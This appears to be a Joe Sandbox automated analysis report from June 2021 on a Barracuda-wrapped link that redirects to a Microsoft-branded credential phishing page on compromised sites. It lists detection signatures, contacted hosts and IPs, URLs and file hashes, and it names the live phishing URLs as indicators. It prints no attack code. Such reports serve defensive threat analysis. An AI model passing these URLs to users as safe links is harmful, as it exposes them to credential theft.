Loading ...

Play interactive tourEdit tour

Analysis Report https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.ptcul.org%2fQUICKENLOANPayoffST.html&c=E,1,cZ4it7vUwwU40xP49hVIDZK5zOpWEgKMytxlbf_fzHhDG3IqiFWUNMvV6eqmKn6vwO6xqwRYpRL0NHQwJYVrLrUcxE9Wn2XjCcsSWt4750g-TU3V0KQw&typo=1

Overview

General Information

Sample URL:https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.ptcul.org%2fQUICKENLOANPayoffST.html&c=E,1,cZ4it7vUwwU40xP49hVIDZK5zOpWEgKMytxlbf_fzHhDG3IqiFWUNMvV6eqmKn6vwO6xqwRYpRL0NHQwJYVrLrUcxE9Wn2XjCcsSWt4750g-TU3V0KQw&typo=1
Analysis ID:433337
Infos:

Most interesting Screenshot:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo template match)
HTML body contains low number of good links
HTML title does not match URL

Classification

Process Tree

  • System is w10x64
  • iexplore.exe (PID: 5784 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4956 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5784 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\wap[1].htmJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    Phishing:

    barindex
    Yara detected HtmlPhish10Show sources
    Source: Yara matchFile source: 506407.0.links.csv, type: HTML
    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\wap[1].htm, type: DROPPED
    Phishing site detected (based on image similarity)Show sources
    Source: https://itmddn.com/QUICKENFILE/micro.svgMatcher: Found strong image similarity, brand: MicrosoftJump to dropped file
    Phishing site detected (based on logo template match)Show sources
    Source: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432Matcher: Template: microsoft matched
    Source: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432HTTP Parser: Number of links: 0
    Source: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432HTTP Parser: Number of links: 0
    Source: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432HTTP Parser: Title: 0auth does not match URL
    Source: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432HTTP Parser: Title: 0auth does not match URL
    Source: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432HTTP Parser: No <meta name="author".. found
    Source: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432HTTP Parser: No <meta name="author".. found
    Source: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432HTTP Parser: No <meta name="copyright".. found
    Source: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432HTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
    Source: unknownHTTPS traffic detected: 52.58.148.216:443 -> 192.168.2.5:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.58.148.216:443 -> 192.168.2.5:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.205.64.138:443 -> 192.168.2.5:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.205.64.138:443 -> 192.168.2.5:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.205.64.138:443 -> 192.168.2.5:49728 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.205.64.138:443 -> 192.168.2.5:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.205.64.138:443 -> 192.168.2.5:49729 version: TLS 1.2
    Source: favicon[1].htm.3.drString found in binary or memory: <li class="top_bar_contact_item"><a href="https://www.facebook.com/ITMddn" target="_blank" class="tooltip-bottom"> <i class="fa fa-facebook"></i></a></li> <li class="top_bar_contact_item"><a href="https://www.youtube.com/channel/UC0udGRFOTR-QX1c9ezgB6HQ" target="_blank" class="tooltip-bottom" ><i class="fa fa-youtube"></i></a></li> equals www.facebook.com (Facebook)
    Source: favicon[1].htm.3.drString found in binary or memory: <li class="top_bar_contact_item"><a href="https://www.facebook.com/ITMddn" target="_blank" class="tooltip-bottom"> <i class="fa fa-facebook"></i></a></li> <li class="top_bar_contact_item"><a href="https://www.youtube.com/channel/UC0udGRFOTR-QX1c9ezgB6HQ" target="_blank" class="tooltip-bottom" ><i class="fa fa-youtube"></i></a></li> equals www.youtube.com (Youtube)
    Source: favicon[1].htm.3.drString found in binary or memory: <p class="pb-10 pr-30 res-575-pr-0" align="justify"><iframe allow="autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share" allowfullscreen="true" frameborder="0" height="300" scrolling="no" src="https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FITMddn&amp;tabs=timeline&amp;width=340&amp;height=300&amp;small_header=false&amp;adapt_container_width=true&amp;hide_cover=false&amp;show_facepile=true&amp;appId" style="border:none;overflow:hidden" width="100%"></iframe> equals www.facebook.com (Facebook)
    Source: favicon[1].htm.3.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" ><i class="fa fa-facebook"></i> </a> <i class="fa fa-angle-double-up scroll-top"></i> equals www.facebook.com (Facebook)
    Source: unknownDNS traffic detected: queries for: linkprotect.cudasvc.com
    Source: favicon[1].htm.3.drString found in binary or memory: http://cm.uk.gov.in/
    Source: favicon[1].htm.3.drString found in binary or memory: http://hitwebcounter.com/counter/counter.php?page=7055334&style=0007&nbdigits=9&type=ip&initCount=10
    Source: favicon[1].htm.3.drString found in binary or memory: http://itmddn.com/itm-prospectus-2021-final.pdf
    Source: favicon[1].htm.3.drString found in binary or memory: http://mail.ptcul.org/
    Source: favicon[1].htm.3.drString found in binary or memory: http://uktenders.gov.in/nicgep/app
    Source: favicon[1].htm.3.drString found in binary or memory: http://webline.co.in/itm/document/application-form-itm.pdf
    Source: favicon[1].htm.3.drString found in binary or memory: http://www.governoruk.gov.in/
    Source: favicon[1].htm.3.drString found in binary or memory: http://www.hitwebcounter.com
    Source: favicon[1].htm.3.drString found in binary or memory: http://www.ptcul.org.
    Source: favicon[1].htm.3.drString found in binary or memory: http://www.ptcul.org/noc/
    Source: favicon[1].htm.3.drString found in binary or memory: https://code.jquery.com/ui/1.12.1/jquery-ui.js
    Source: QUICKENLOANPayoffST[1].htm.3.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTvJ9LhHlll4c4Y8v0G3PBpvTXnyhiRdLTsXT7Jtk3ZR7YL
    Source: favicon[1].htm.3.drString found in binary or memory: https://forms.eduqfix.com/insttechmgt/add
    Source: {F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drString found in binary or memory: https://itmddn.com/QUI
    Source: QUICKENLOANPayoffST[1].htm.3.drString found in binary or memory: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432
    Source: {F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drString found in binary or memory: https://itmddn.com/QUIQUICKENLOANPayoffST.htmlCKENFILE/wap.php?wap=4UY432Root
    Source: favicon[1].htm.3.drString found in binary or memory: https://noc.uksldc.in/
    Source: data[1].js.3.drString found in binary or memory: https://outlook.live.com/owa/
    Source: favicon[1].htm.3.drString found in binary or memory: https://webline.in/
    Source: favicon[1].htm.3.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-127582903-1
    Source: favicon[1].htm.3.drString found in binary or memory: https://www.itmddn.com/itm-prospectus-2020-final.pdf
    Source: favicon[1].htm.3.drString found in binary or memory: https://www.itmddn.online
    Source: {F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.dr, ~DF74B79FAF2663A557.TMP.2.drString found in binary or memory: https://www.ptcul.org/QUICKENLOANPayoffST.html
    Source: {F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drString found in binary or memory: https://www.ptcul.org/QUICKENLOANPayoffST.html.Quicken
    Source: {F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drString found in binary or memory: https://www.ptcul.org/QUICKENLOANPayoffST.htmlRoot
    Source: ~DF74B79FAF2663A557.TMP.2.drString found in binary or memory: https://www.ptcul.org/QUICKENLOANPayoffST.html~
    Source: favicon[1].htm.3.drString found in binary or memory: https://www.tenderwizard.com/ROOTAPP/PTCUL.jsp?enc%3DkphSKaWwsq080wYCvjz4XVKhb65%2B2glBBqQTdlDr%2BwA
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownHTTPS traffic detected: 52.58.148.216:443 -> 192.168.2.5:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.58.148.216:443 -> 192.168.2.5:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.205.64.138:443 -> 192.168.2.5:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.205.64.138:443 -> 192.168.2.5:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.205.64.138:443 -> 192.168.2.5:49728 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.205.64.138:443 -> 192.168.2.5:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 103.205.64.138:443 -> 192.168.2.5:49729 version: TLS 1.2
    Source: classification engineClassification label: mal56.phis.win@3/14@4/2
    Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F25EFFC0-CB0F-11EB-90E5-ECF4BB570DC9}.datJump to behavior
    Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF25C900E5007E33CB.TMPJump to behavior
    Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
    Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5784 CREDAT:17410 /prefetch:2
    Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5784 CREDAT:17410 /prefetch:2
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
    Source: {F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drBinary or memory string: 1vv9apFA3TyTspd+VZIqEmUlPOUXEVmiNn9WsRkRDqbyXyWMFIRjrnyCIG6pMXbSLa0U1FF6ow86
    Source: {F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drBinary or memory string: VMohuekjNZ9GBlrdhCpr0hIFes3+pllsRaI5IlXqeMUZqPX1UuLc8ok8TR6JsAjnlXI2L9YX0TYQ
    Source: {F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drBinary or memory string: /5NSUs3Zob/IovMCijIQWknCwq500z4BsK8+DnxH+7pk/enZQZJCwJdh5VC6d3iod8lRWhdl3yNK

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.ptcul.org%2fQUICKENLOANPayoffST.html&c=E,1,cZ4it7vUwwU40xP49hVIDZK5zOpWEgKMytxlbf_fzHhDG3IqiFWUNMvV6eqmKn6vwO6xqwRYpRL0NHQwJYVrLrUcxE9Wn2XjCcsSWt4750g-TU3V0KQw&typo=10%Avira URL Cloudsafe

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://www.ptcul.org/QUICKENLOANPayoffST.htmlRoot0%Avira URL Cloudsafe
    https://noc.uksldc.in/0%VirustotalBrowse
    https://noc.uksldc.in/0%Avira URL Cloudsafe
    https://webline.in/0%Avira URL Cloudsafe
    https://itmddn.com/QUIQUICKENLOANPayoffST.htmlCKENFILE/wap.php?wap=4UY432Root0%Avira URL Cloudsafe
    http://uktenders.gov.in/nicgep/app0%Avira URL Cloudsafe
    https://www.itmddn.online0%Avira URL Cloudsafe
    https://www.ptcul.org/QUICKENLOANPayoffST.html.Quicken0%Avira URL Cloudsafe
    http://webline.co.in/itm/document/application-form-itm.pdf0%Avira URL Cloudsafe
    http://itmddn.com/itm-prospectus-2021-final.pdf0%Avira URL Cloudsafe
    http://www.ptcul.org/noc/0%Avira URL Cloudsafe
    https://forms.eduqfix.com/insttechmgt/add0%Avira URL Cloudsafe
    http://cm.uk.gov.in/0%Avira URL Cloudsafe
    http://www.governoruk.gov.in/0%Avira URL Cloudsafe
    https://www.itmddn.com/itm-prospectus-2020-final.pdf0%Avira URL Cloudsafe
    http://mail.ptcul.org/0%Avira URL Cloudsafe
    http://www.ptcul.org.0%Avira URL Cloudsafe
    https://itmddn.com/QUI0%Avira URL Cloudsafe
    https://www.ptcul.org/QUICKENLOANPayoffST.html~0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    itmddn.com
    103.205.64.138
    truefalse
      unknown
      linkprotect.cudasvc.com
      52.58.148.216
      truefalse
        unknown
        ptcul.org
        103.205.64.138
        truefalse
          unknown
          www.ptcul.org
          unknown
          unknownfalse
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://www.ptcul.org/QUICKENLOANPayoffST.htmltrue
              unknown
              https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432true
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://outlook.live.com/owa/data[1].js.3.drfalse
                  high
                  https://www.ptcul.org/QUICKENLOANPayoffST.htmlRoot{F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://noc.uksldc.in/favicon[1].htm.3.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://code.jquery.com/ui/1.12.1/jquery-ui.jsfavicon[1].htm.3.drfalse
                    high
                    http://www.hitwebcounter.comfavicon[1].htm.3.drfalse
                      high
                      https://webline.in/favicon[1].htm.3.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432QUICKENLOANPayoffST[1].htm.3.drfalse
                        unknown
                        https://itmddn.com/QUIQUICKENLOANPayoffST.htmlCKENFILE/wap.php?wap=4UY432Root{F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://uktenders.gov.in/nicgep/appfavicon[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.itmddn.onlinefavicon[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.ptcul.org/QUICKENLOANPayoffST.html.Quicken{F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://webline.co.in/itm/document/application-form-itm.pdffavicon[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.ptcul.org/QUICKENLOANPayoffST.html{F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.dr, ~DF74B79FAF2663A557.TMP.2.drfalse
                          unknown
                          http://itmddn.com/itm-prospectus-2021-final.pdffavicon[1].htm.3.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.tenderwizard.com/ROOTAPP/PTCUL.jsp?enc%3DkphSKaWwsq080wYCvjz4XVKhb65%2B2glBBqQTdlDr%2BwAfavicon[1].htm.3.drfalse
                            high
                            http://hitwebcounter.com/counter/counter.php?page=7055334&style=0007&nbdigits=9&type=ip&initCount=10favicon[1].htm.3.drfalse
                              high
                              http://www.ptcul.org/noc/favicon[1].htm.3.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://forms.eduqfix.com/insttechmgt/addfavicon[1].htm.3.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://cm.uk.gov.in/favicon[1].htm.3.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.governoruk.gov.in/favicon[1].htm.3.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.itmddn.com/itm-prospectus-2020-final.pdffavicon[1].htm.3.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://mail.ptcul.org/favicon[1].htm.3.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.ptcul.org.favicon[1].htm.3.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://itmddn.com/QUI{F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat.2.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.ptcul.org/QUICKENLOANPayoffST.html~~DF74B79FAF2663A557.TMP.2.drfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              52.58.148.216
                              linkprotect.cudasvc.comUnited States
                              16509AMAZON-02USfalse
                              103.205.64.138
                              itmddn.comIndia
                              17439NETMAGIC-APNetmagicDatacenterMumbaiINfalse

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:433337
                              Start date:11.06.2021
                              Start time:16:50:38
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 3m 37s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Cookbook file name:browseurl.jbs
                              Sample URL:https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.ptcul.org%2fQUICKENLOANPayoffST.html&c=E,1,cZ4it7vUwwU40xP49hVIDZK5zOpWEgKMytxlbf_fzHhDG3IqiFWUNMvV6eqmKn6vwO6xqwRYpRL0NHQwJYVrLrUcxE9Wn2XjCcsSWt4750g-TU3V0KQw&typo=1
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal56.phis.win@3/14@4/2
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Browsing link: https://itmddn.com/QUICKENFILE/wap.php?wap=4UY432
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.193.48, 88.221.62.148, 172.217.19.110, 184.30.20.56, 20.50.102.62, 152.199.19.161
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, encrypted-tbn0.gstatic.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, skypedataprdcolcus15.cloudapp.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, skypedataprdcoleus17.cloudapp.net, go.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
                              • Not all processes where analyzed, report is missing behavior information

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F25EFFC0-CB0F-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):30296
                              Entropy (8bit):1.8476140672654426
                              Encrypted:false
                              SSDEEP:192:rCZRZs2GW2tcifVm4zMpwB2CDOsfpm/jX:r+3bdWD4ADj+
                              MD5:67D6688501C1D5995EB94DD22105675B
                              SHA1:9C74D338F18BB9CB6321B6CAF4AF544E717AFC9D
                              SHA-256:4DA4B485D1E597B3CF7308F6D8FB24FC524DB4DD31FAE8A7645541392B7F98C4
                              SHA-512:BE3E82307F26E65C069FA281355496DFB754A0EC8DC718AA238C458E3D3F64F4B8764D2C37F907CE8F1AA6F730CCC7FD98C1431EBBED4402B5F32F3083DC415D
                              Malicious:false
                              Reputation:low
                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F25EFFC2-CB0F-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):3139088
                              Entropy (8bit):4.086569331873223
                              Encrypted:false
                              SSDEEP:24576:N0cEXSFylq5lVyRF41kcYAmqyy0cEXSFylq5lVyRF41kcYAmqp:NwF4mI5wF4mIp
                              MD5:95C286991F4219550DD225BBD69181FF
                              SHA1:B527741CD1CB73593067BF0A08F775342E3C2CDD
                              SHA-256:F42905C585E8DBDE405B8A2D0E7C16FEE25F48B88619B77B97F75E479F0C23DF
                              SHA-512:CF9B84667A5E0CFEEDC0B14901DAB278FBAEBAAA03B1B63837F213124D8FB704B1C63A68EB4281DF14CF3E363DF0E54DD6BA7081033DEBDBBC5FC1F574AAC93F
                              Malicious:false
                              Reputation:low
                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FA426710-CB0F-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):16984
                              Entropy (8bit):1.5659409247704654
                              Encrypted:false
                              SSDEEP:48:IwTGcprqGwpanEG4pQd2GrapbS3GQpK/G7HpRzTGIpG:rpZyQ06OBSBAOT5A
                              MD5:890F34924670AC7AFFE2364DDD3B215F
                              SHA1:BE7AC331590CC3475C5E8BE9AC3169CC2F50850D
                              SHA-256:EEB8F07A6DDDD3A6C91A41914201EE1127174A220858C262DDEF9CAD4EE08924
                              SHA-512:695EC9E9C6C1D07B175A6B2B35DAE19542AEFD35A5F63CE5339699440A999AEEB6DF810BEEB325E1AF235E3195FEA850BED3C64BD91EDE2767D0639AECC553F0
                              Malicious:false
                              Reputation:low
                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\favicon[1].htm
                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                              Category:dropped
                              Size (bytes):51782
                              Entropy (8bit):4.417542507576741
                              Encrypted:false
                              SSDEEP:384:isB2QqbUXFZa7rIwItQ/XPnfR91QzdYBgDtWycMljOognzq3JOjnFUrMVY9pcW9w:isB2+FZanItCf/fR9ubtneq3Mqs
                              MD5:D8ADDF0564A887FBA265D39E6B9C0C6C
                              SHA1:B2472CA3EE25B66137779E74166851C92843B266
                              SHA-256:2C9F99FCFFEF2195DBD9CFD180DE6274C6885E964CA8C42BF368A1BBDE265911
                              SHA-512:D4319EB5FA1406E01C0B13E3AC68B69EBB2FCCF208202CBFC82C16EFC92C2A50DFB51AF3FDD3124FB330CB6916DACD1E112FE866BB9AC69021BDC2F38CCBE011
                              Malicious:false
                              Reputation:low
                              Preview: <!DOCTYPE html>.<html lang="en">.<head>.<title>Welcome to Power Tranmission Corporation of Uttarakhand Limited</title>.<meta name="description" content="Welcome to Power Tranmission Corporation of Uttarakhand Limited">.<meta name="keywords" content="Welcome to Power Tranmission Corporation of Uttarakhand Limited">.<meta charset="UTF-8">.<meta name="viewport" content="width=device-width, initial-scale=1.0">.<link rel="stylesheet" href="assets/css/bootstrap.min.css">.<link rel="stylesheet" href="assets/css/font-awesome.min.css">.<link rel="stylesheet" href="assets/css/owl.carousel.css">.<link rel="stylesheet" href="assets/css/nice-select.css">.<link rel="stylesheet" href="assets/css/slicknav.min.css">.<link rel="stylesheet" href="assets/css/magnific-popup.css">.<link rel="stylesheet" href="assets/css/custom-progress.css">.<link rel="stylesheet" href="assets/css/style.css">.<link rel="stylesheet" href="assets/css/responsive.css">.<link rel="stylesheet" href="assets/css/pure-js-lightbox.mi
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\wap[1].htm
                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              File Type:PHP script, ASCII text, with very long lines, with CRLF line terminators
                              Category:downloaded
                              Size (bytes):6927
                              Entropy (8bit):4.924201201225566
                              Encrypted:false
                              SSDEEP:96:3gCZzrU2isVdK5QXr5k9ZBDZU4dXr5k9ZBDZU4pXr5k9ZBDZU4pPjXddxHvi:w2vNisVdCESfSzSVjfli
                              MD5:1A4DDA30F1E58B6D9AA1EACC3291594B
                              SHA1:1C53320B4C4B2C28281871968EA7291E966060DB
                              SHA-256:D8E48EAADA21C33E836D7EB56DB23155A6B0155BDD1DDD93B5071CA558490F66
                              SHA-512:B353FBA2FD969BB3BC962C099E796544CDF819E5AAAD36F08E802690F5FC24F12F5D27B74E858CC76B111ECAAEC72CF41FBBBEECC738084AD2F42BB49F5B36CF
                              Malicious:true
                              Yara Hits:
